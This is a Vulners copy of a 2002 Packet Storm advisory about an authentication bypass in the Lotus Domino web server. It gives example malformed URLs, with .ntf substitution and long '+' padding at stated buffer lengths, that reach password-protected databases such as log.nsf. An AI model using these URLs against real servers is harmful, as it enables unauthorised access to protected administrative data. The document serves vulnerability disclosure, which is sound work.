Lucene search
K

lotus.domino.bypass.txt

🗓️ 05 Feb 2002 00:00:00Reported by Gabriel MaggiottiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

Security flaw in Lotus Domino allows password bypass via malformed URLs, posing high risk.

Code
`---------------------------------------------------------------------------  
Web: http://qb0x.net Author: Gabriel A. Maggiotti  
Date: Febrary 03, 2002 E-mail: [email protected]  
---------------------------------------------------------------------------  
  
  
General Info  
------------  
Problem Type : password protected url bypass  
Product : Lotus Domino  
Scope : Remote  
Risk : High  
  
  
Summary  
-------  
A security vulnerability has been found in the popular Lotus Domino Web server.  
Lotus Domino have files like webadmin.nsf, log.nsf and names.nfs, this files   
are protected by password. I discover that is posible to bypass this password   
if you create a malformed url.  
  
Notes Databases '.nsf' like webadmin.nsf or log.nsf are store in "lotus/domino/  
data/" directory nas Notes Templatesi '.ntf' are store in the same place (Here  
is the goal).  
  
  
Examples:  
  
I found a critical and max length.  
  
assuming the buffer is: http://host.com/<buffer>/  
  
Critical buffer length: is the minimun buffer length you need to bypass the   
passwd file.  
  
normal url: http://host.com/log.nsf <---- Request for a passwd  
modify url: http://host.com/log.ntf<buff>.snf/  
|-----217 -------|  
  
In the case of log.nsf, <buff> is 217 - 12 = 205 '+' and the url will be:  
  
http://host.com/log.ntf++++++++++++++++++++.nsf/  
|-------- 205 -----|   
  
  
If you write a buffer between 219 and 257(higher buffer), you bypass the passwd.  
modify url: http://host.com/log.ntf<buff>.snf/  
|---219 to 257 --|  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation